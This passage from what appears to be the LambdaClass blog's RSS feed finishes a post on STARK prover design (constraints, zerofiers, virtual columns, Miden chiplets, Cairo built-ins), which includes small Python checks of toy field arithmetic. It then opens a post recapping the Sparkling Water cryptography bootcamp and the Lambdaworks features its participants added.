&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * More complex constraints: these can involve more rows, or be applied only at specific points, which makes their description a bit more complicated.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
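As a quick sanity check of the three basic constraint types, here is a toy two-register trace over the field of integers modulo 17 (all values are made up for illustration): register $1$ plays the boolean role, and register $0$ follows the transition $x_{0,k+1} = x_{0,k}^2 + x_{1,k}$.

```python
# Toy trace over F_17 (illustrative values only).
P = 17
x0 = [2, 5, 9, 14]   # x0[k+1] = x0[k]^2 + x1[k] (mod 17)
x1 = [1, 1, 1, 1]    # boolean register

# Boundary constraint: register 0 starts at 2, i.e. P(x) = x_0 - 2 at row 0.
assert (x0[0] - 2) % P == 0

# Consistency constraint: register 1 is boolean on every row.
for k in range(4):
    assert x1[k] * (1 - x1[k]) % P == 0

# Transition constraint: holds on every row except the last.
for k in range(3):
    assert (x0[k + 1] - x0[k] ** 2 - x1[k]) % P == 0
```

A real prover does not evaluate constraints row by row like this; it composes them with the trace polynomials, but the residues it checks are exactly these.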
&lt;p&gt;To enforce the constraints, we need to compose the trace polynomials (obtained by interpreting the trace as evaluations of polynomials over some set $D$) with the constraint polynomials, obtaining as many $C_i (x)$ as constraints we have, and dividing each $C_i (x)$ by their corresponding zerofier, $Z_i (x)$, which is a polynomial that is $0$ where the constraint is enforced. Some zerofiers are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Simple boundary constraint: $Z(x) = x - g^k$, where $g$ generates the domain $D$ ($D = \{ g^0, g, g^2, \dots, g^{n - 1} \}$).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Consistency constraints: $Z(x) = x^n - 1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Simple transition constraint: $Z(x) = (x^n - 1)&#x2F;(x - g^{n - 1})$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
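These zerofiers can be verified numerically. Below is a small check with toy parameters of our choosing: the field of integers modulo 17 and a domain of size $n = 8$ generated by $g = 2$.

```python
# Numerical check of the three zerofiers over F_17, domain D = {g^0..g^7}.
P, g, n = 17, 2, 8
D = [pow(g, j, P) for j in range(n)]

# Consistency zerofier x^n - 1 vanishes on all of D.
assert all((pow(x, n, P) - 1) % P == 0 for x in D)

# Boundary zerofier x - g^k vanishes at exactly one row.
k = 3
assert [(x - pow(g, k, P)) % P == 0 for x in D].count(True) == 1

# Transition zerofier (x^n - 1)/(x - g^{n-1}) = prod_{j < n-1} (x - g^j):
# it vanishes on every row except the last one.
def z_transition(x):
    acc = 1
    for j in range(n - 1):
        acc = acc * (x - pow(g, j, P)) % P
    return acc

assert all(z_transition(x) == 0 for x in D[:-1]) and z_transition(D[-1]) != 0
```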
&lt;p&gt;The efficiency of the STARK prover depends partly on being able to compute these zerofiers quickly. If a constraint were to apply in steps $1, 3, 4, 6, 7, 9, 12, 14, … n-1$ with no clear pattern, we would have to spend almost linear time evaluating the polynomial. For the simplest prover, it is best to work with constraints that involve at most two consecutive rows and are either boundary, consistency, or simple transition constraints. This reduces the number of zerofiers we need to calculate and the number of multiplications.&lt;&#x2F;p&gt;
&lt;p&gt;The AIR we use and how we organize the trace is important in terms of performance and usability. High-degree constraints in the AIR are going to make the evaluation of the composition polynomial more expensive. On the other hand, having a rigid organization of the trace (trace layout) adds overhead to the proving of general programs and makes it difficult to make changes to the prover. Miden has been developing &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;0xPolygonMiden&#x2F;air-script&#x2F;&quot;&gt;AIRScript&lt;&#x2F;a&gt;, which is designed to make AIR description and evaluation simple and performant. In Lambdaworks, we are also working to make the definition of AIRs and the evaluation of constraints simpler, leading to faster provers and easier maintenance or updates.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;different-algebraic-intermediate-representations&quot;&gt;Different Algebraic Intermediate Representations&lt;&#x2F;h2&gt;
&lt;p&gt;The AIR for the Miden vm is contained &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;0xPolygonMiden&#x2F;miden-vm&#x2F;tree&#x2F;main&#x2F;air&quot;&gt;here&lt;&#x2F;a&gt;. The Stone prover’s AIR is dependent on the type of layout; the generalities of the AIR are &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;tree&#x2F;main&#x2F;src&#x2F;starkware&#x2F;air&quot;&gt;here&lt;&#x2F;a&gt;. This is a list of the different layouts in Starknet:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Plain&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Small&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Dex&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Recursive&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Starknet&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * StarknetWithKeccak&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * RecursiveLargeOutput&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * AllCairo&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * AllSolidity&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Dynamic&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Here we show the diagram of a single step of the main trace for the plain layout in Starknet, without the auxiliary trace (for more information, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;blob&#x2F;main&#x2F;docs&#x2F;src&#x2F;starks&#x2F;stone_prover&#x2F;trace_plain_layout.md&quot;&gt;our analysis&lt;&#x2F;a&gt;):&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;ry0W20A_T.png&quot; alt=&quot;main_trace&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The Stone Prover packs several registers in a single column, creating virtual columns. For example, all 16 flags are grouped under one column. The memory’s addresses and values are also grouped in an interleaved way in another column. This reduces the number of columns in the trace (we merge $16$ columns into $1$), but the trace length becomes $16$ times larger. When we want to find the trace polynomials, we perform one Fast Fourier Transform (FFT) of size $16n$, instead of $16$ FFTs of size $n$.&lt;&#x2F;p&gt;
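Interleaving itself is just a reindexing of the same cells. A minimal sketch, with hypothetical helper names of our choosing:

```python
# Interleave 16 columns of length n into one virtual column of length 16n,
# as Stone does with the flags: out[16*k + j] = cols[j][k].
def interleave(cols):
    n = len(cols[0])
    return [cols[j][k] for k in range(n) for j in range(len(cols))]

def deinterleave(vcol, width=16):
    # Column j is recovered by striding through the virtual column.
    return [vcol[j::width] for j in range(width)]

cols = [[(j * k) % 2 for k in range(4)] for j in range(16)]  # toy flag columns
vcol = interleave(cols)
assert len(vcol) == 16 * 4
assert deinterleave(vcol) == cols   # round-trip loses nothing
```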
&lt;p&gt;Using virtual columns can be useful if some of the registers are updated only a few times: since we would otherwise have to pad them to full length, grouping them reduces memory use in the trace. However, this comes with a big disadvantage: we have to keep different zerofiers, and the evaluation frames (which we use to compute constraints efficiently) become more complex. Let’s see the difference between both approaches:&lt;&#x2F;p&gt;
&lt;h3 id=&quot;16-columns&quot;&gt;16 columns&lt;&#x2F;h3&gt;
&lt;p&gt;To evaluate each of the constraints, we need to take just the elements of one row. The trace has length $n$, so the zerofier is $Z (x) = x^n - 1$. 15 flags have the constraint $x (1 - x) = 0$, while the last one has $x = 0$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;single-virtual-column&quot;&gt;Single virtual column&lt;&#x2F;h3&gt;
&lt;p&gt;To evaluate each constraint, we need to take just one element from the row. The problem is that the constraint $x (1 - x)$ is valid for all rows except every $16$-th row, while the constraint $x = 0$ is valid only on every $16$-th row. As a result, we have to maintain two zerofiers, one for each constraint:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $Z (x) = (x^{16n} - 1) &#x2F; (x^n - g^{15n})$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $Z (x) = x^n - g^{15n}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The other problem is that, if a constraint involves several flags, we need to pass several rows to be able to evaluate it. It is worth noting that $g$ in this case is different from the previous case, as the interpolation now takes place over a domain of size $16n$.&lt;&#x2F;p&gt;
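To see where these zerofiers vanish, here is a small numerical check with toy parameters of our choosing: $n = 2$, a domain of size $16n = 32$ inside the integers modulo $97$, and $g$ a generator of that domain found by brute force. The polynomial $x^n - g^{15n}$ vanishes exactly on every $16$-th row.

```python
# Where does x^n - g^{15n} vanish, with g generating the size-16n domain?
# Toy parameters: n = 2, 16n = 32, p = 97 (since 32 divides 96).
p, n = 97, 2
g = next(h for h in (pow(a, (p - 1) // (16 * n), p) for a in range(2, p))
         if pow(h, 16, p) != 1)      # brute-force an element of order exactly 32
c = pow(g, 15 * n, p)                # the constant g^{15n}

for j in range(16 * n):
    z2 = (pow(g, n * j, p) - c) % p  # evaluate x^n - g^{15n} at x = g^j
    # vanishes exactly on rows 15, 31, ... (every 16-th row):
    assert (z2 == 0) == (j % 16 == 15)
```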
&lt;h2 id=&quot;built-ins-and-chiplets&quot;&gt;Built-ins and chiplets&lt;&#x2F;h2&gt;
&lt;p&gt;Having a general-purpose CPU for proving comes with a cost: the virtual machine is not optimized for some commonly used operations. To deal with this, the Cairo vm (Starknet) and Miden vm introduce coprocessors to deal with these operations and then communicate the results to the CPU.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;chiplets-and-the-miden-vm&quot;&gt;Chiplets and the Miden vm&lt;&#x2F;h3&gt;
&lt;p&gt;Miden uses dedicated components to accelerate complex computations, called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.polygon.technology&#x2F;miden&#x2F;vm&#x2F;architecture&#x2F;chiplets&#x2F;&quot;&gt;chiplets&lt;&#x2F;a&gt;. Each chiplet handles a unique computation and is responsible for proving the correctness of the computation and its internal consistency. Currently supported chiplets are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Hash&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Bitwise&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Memory&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Kernel ROM&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Range checker (it works as a chiplet, but it is handled separately)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The chiplets execution trace is built by stacking the execution traces of each of the chiplets. This is an optimization since each chiplet is likely to generate fewer cells than other components of the vm, avoiding significant padding to take them to the same length and reducing the number of columns. It uses a similar reasoning to virtual columns in Stone, but it does not interleave them.&lt;&#x2F;p&gt;
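The stacking idea can be sketched in a few lines. This is a toy version with made-up trace shapes: rows are padded to the widest chiplet and the traces are placed one below the other, instead of side by side at a common length.

```python
# Toy sketch of stacking chiplet traces (all shapes are illustrative).
hash_trace    = [[1, 2, 3], [4, 5, 6]]         # 2 rows, 3 columns
bitwise_trace = [[7, 8], [9, 10], [11, 12]]    # 3 rows, 2 columns

def stack(traces, pad=0):
    # Pad every row to the widest chiplet, then stack the traces vertically.
    width = max(len(row) for t in traces for row in t)
    out = []
    for t in traces:
        for row in t:
            out.append(row + [pad] * (width - len(row)))
    return out

stacked = stack([hash_trace, bitwise_trace])
assert len(stacked) == 5 and all(len(r) == 3 for r in stacked)
```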
&lt;p&gt;Chiplets are identified by selectors. The total degree of the constraints is between $5$ and $9$ and each chiplet takes between 6 and 17 columns. The selectors are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $1$: hash&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $1,0$: bitwise&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $1,1,0$: Memory&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $1,1,1,0$: Kernel ROM&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $1,1,1,1$: padding&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Stacking the traces of the chiplets introduces some difficulties, though, since the consistency and transition constraints in the last row of one chiplet may conflict with the first row of the next chiplet. This is the case for the memory and kernel ROM chiplets, where selector flags resolve the conflicts.&lt;&#x2F;p&gt;
&lt;p&gt;The chiplets are connected to the rest of the VM using a bus, which can send requests to any of the chiplets and receive a response. It is implemented as a running product column and, if the requests and responses match, the bus will begin and end with $1$.&lt;&#x2F;p&gt;
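The running product idea can be sketched as follows. This is a toy version with made-up values: each request multiplies a term into the product and each matching response multiplies in its inverse, so the column returns to $1$ exactly when requests and responses agree as multisets. A real bus also folds the operation data into each term and samples the challenge from the verifier.

```python
# Toy bus as a running product over a prime field.
p = 2**31 - 1          # the 31-bit Mersenne prime
alpha = 123456789      # challenge (verifier-sampled in a real protocol)

requests  = [3, 5, 7]
responses = [7, 3, 5]  # same multiset, different order

bus = 1
for r in requests:
    bus = bus * (alpha - r) % p
for s in responses:
    bus = bus * pow(alpha - s, p - 2, p) % p  # multiply by the inverse

assert bus == 1        # requests and responses matched
```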
&lt;p&gt;One of the main drawbacks of this approach is that the constraints have a rather large degree, which makes constraint evaluation more expensive. On the other hand, the construction does not require handling several zerofiers and looks simpler to implement and understand.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;built-ins-and-cairo-vm&quot;&gt;Built-ins and Cairo vm&lt;&#x2F;h3&gt;
&lt;p&gt;Built-ins are application-specific AIRs that can reduce the size of the execution trace of a given computation. For example, expressing the Poseidon hash function using Cairo needs 35k cells in the trace, while the Poseidon built-in reduces this to roughly 600-650 cells. Among the built-ins, we have:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Poseidon&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Pedersen&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Elliptic curve operation&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Keccak&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Bitwise&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * ECDSA&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Range check&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The integration of the built-ins needs some care, though, as naïve approaches may waste cells, reducing the efficiency of the construction. Layouts specify the number of cells and the positions that are allocated to each component. Depending on the type of program we want to prove, we can select from the different layouts offered in Starknet to achieve the most cost-effective solution. However, it may be the case that the existing layouts impose significant overhead when proving our program, as noted in the discussion of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;starkware.co&#x2F;resource&#x2F;builtins-and-dynamic-layouts&#x2F;&quot;&gt;dynamic layouts&lt;&#x2F;a&gt;. Adding new layouts requires expert knowledge and careful analysis; it may also be confusing to users, who need to understand the differences between the layouts.&lt;&#x2F;p&gt;
&lt;p&gt;Each built-in has a memory segment. To check that there is no overflow from the memory segment, there are two pointers (start and stop) that are exported via the public memory mechanism. Since the constraints for each built-in apply every several rows, we are forced to compute different zerofiers and handle more complex evaluation frames.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we discussed the characteristics of STARK provers and some implementation trade-offs. We analyzed how the Miden and Cairo VMs handle their execution traces and the description of the AIR. We also discussed the main types of constraints and the way to enforce them over the execution trace. The use of virtual columns (grouping several registers in one column) reduces the number of FFTs we have to perform, but it comes at the expense of more complex evaluation frames and keeping several zerofiers. However, this strategy is useful when several components have fewer trace cells and would otherwise require padding. Miden uses this type of strategy when dealing with chiplets, but it chooses to stack the traces instead of interleaving them. This introduces several selector variables, which increase the degree of the constraints, adding an extra cost to constraint evaluation. On the other hand, evaluation frames are simpler and we do not have to compute several zerofiers. The use of layouts could lead to a more cost-effective solution, though at the expense of a larger overhead to prove some types of programs. Besides, adding more layouts increases complexity and makes things harder to maintain. We like analyzing the different solutions and their trade-offs, as they could lead to new designs that can help us improve general-purpose provers.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Sparkling Water Bootcamp on Cryptography in a nutshell</title>
          <pubDate>Thu, 11 Jan 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/sparkling-water-bootcamp/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/sparkling-water-bootcamp/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/sparkling-water-bootcamp/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;16 weeks ago, we started the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;blob&#x2F;main&#x2F;bootcamp&#x2F;README.md&quot;&gt;Sparkling Water Bootcamp&lt;&#x2F;a&gt; to teach cryptography and zero-knowledge proofs to a group of engineers and students from around the world, focusing on applications and coding. We started with a team of 21 people, with backgrounds in Computer Science, Physics, Mathematics, Engineering, and Architecture, among others. Our bootcampers came from several countries: India, Turkey, USA, Nigeria, Brazil, Venezuela, Ecuador, Paraguay, Cuba, France, Serbia, and Costa Rica. Given the different backgrounds and time zones, it has been a challenging experience (since it involves coordination, logistics, and adopting the best strategies to teach concepts to people with different learning styles and objectives), but we greatly enjoyed it, learned many things, and made new friends and acquaintances along the way. If you want to know more or keep up with the latest developments, join our &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;t.me&#x2F;lambdaworks&quot;&gt;telegram channel&lt;&#x2F;a&gt; or see the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;Lambdaworks repo&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The contents of the bootcamp included finite field arithmetic, elliptic curves, polynomials, SNARKs, STARKs, symmetric encryption, public key cryptography, signatures, as well as an intro to Fully Homomorphic Encryption (FHE). We also discussed new papers, including &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1784&quot;&gt;Succinct Arguments over Towers of Binary Fields&lt;&#x2F;a&gt;. We hosted several lectures, discussion sessions, workshops, and guest lectures.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;guest-lectures-and-workshops&quot;&gt;Guest Lectures and workshops&lt;&#x2F;h2&gt;
&lt;p&gt;We had the opportunity to invite several speakers from different projects to talk about their work and discuss topics in cryptography. We were lucky to have Immanuel Segol from Ingonyama, Robert Remen from MatterLabs&#x2F;ZKSync, and Alan Szepieniec from Neptune.&lt;&#x2F;p&gt;
&lt;p&gt;We also had workshops taught by engineers at LambdaClass, on Rust (Pablo Deymonnaz), and Cairo Native (Iñaki Garay). You can have a look at all the talks and workshops on the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;playlist?list=PLFX2cij7c2Pwm2XHBijKZ6Eh97BOqtGBh&quot;&gt;YouTube channel&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;exercises&quot;&gt;Exercises&lt;&#x2F;h2&gt;
&lt;p&gt;During the first weeks, we had some practice exercises and challenges, such as naïve implementations of RSA, elliptic curve cryptography, and Shamir secret sharing. Some of the exercises and answers are contained in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;bootcamp&quot;&gt;Sparkling Water Bootcamp readme&lt;&#x2F;a&gt;. We also reviewed some challenges from the &lt;a href=&quot;&#x2F;first-lambda-ingo-zk-ctf-zk-challenges-using-lambdaworks&#x2F;&quot;&gt;Lambda&#x2F;Ingo ZK CTF&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;coding-new-features-in-lambdaworks&quot;&gt;Coding - new features in Lambdaworks&lt;&#x2F;h2&gt;
&lt;p&gt;We were able to put everything we learned into practice by adding new features and proof systems to Lambdaworks. We want to thank our bootcampers for all the hard work they have done during these weeks. Among the additions, we have:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Groth 16 backend, [PR-612](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;612).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Arkworks adapter for Groth 16, [PR-701](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;701)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Added Starknet curve, and Pedersen hash, [PR-597](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;597)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Changing Serialization by AsBytes, [PR-747](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;747).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Affine serialization for elliptic curve points, [PR-687](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;687)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. Pasta curves, [PR-690](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;690), [PR-698](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;698), and [PR-714](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;714).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. Specific backend for the 31-bit Mersenne prime, [PR-669](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;669)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    8. Fuzzer for the BLS12-381 elliptic curve, [PR-664](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;664)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    9. Subgroup checks for BLS12-381 elliptic curve using Frobenius endomorphism, [PR-649](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;649)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    10. New CLI command to be able to prove traces using STARK Platinum, [PR-634](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;634)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    11. Adding support for BabyBear field, [PR-549](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;549), [PR-576](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;576), [PR-629](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;629)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    12. Specialized backend for Mini-Goldilocks field ($2^{64} - 2^{32} + 1$), [PR-622](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;622)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    13. Refactor the field benchmarks, [PR-606](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;606)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    14. Bug fixes, [PR-575](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;575)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    15. Adding Ed448 elliptic curve, [PR-546](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;546), [PR-557](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;557)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    16. Proptest for unsigned integers, [PR-526](https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;526)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
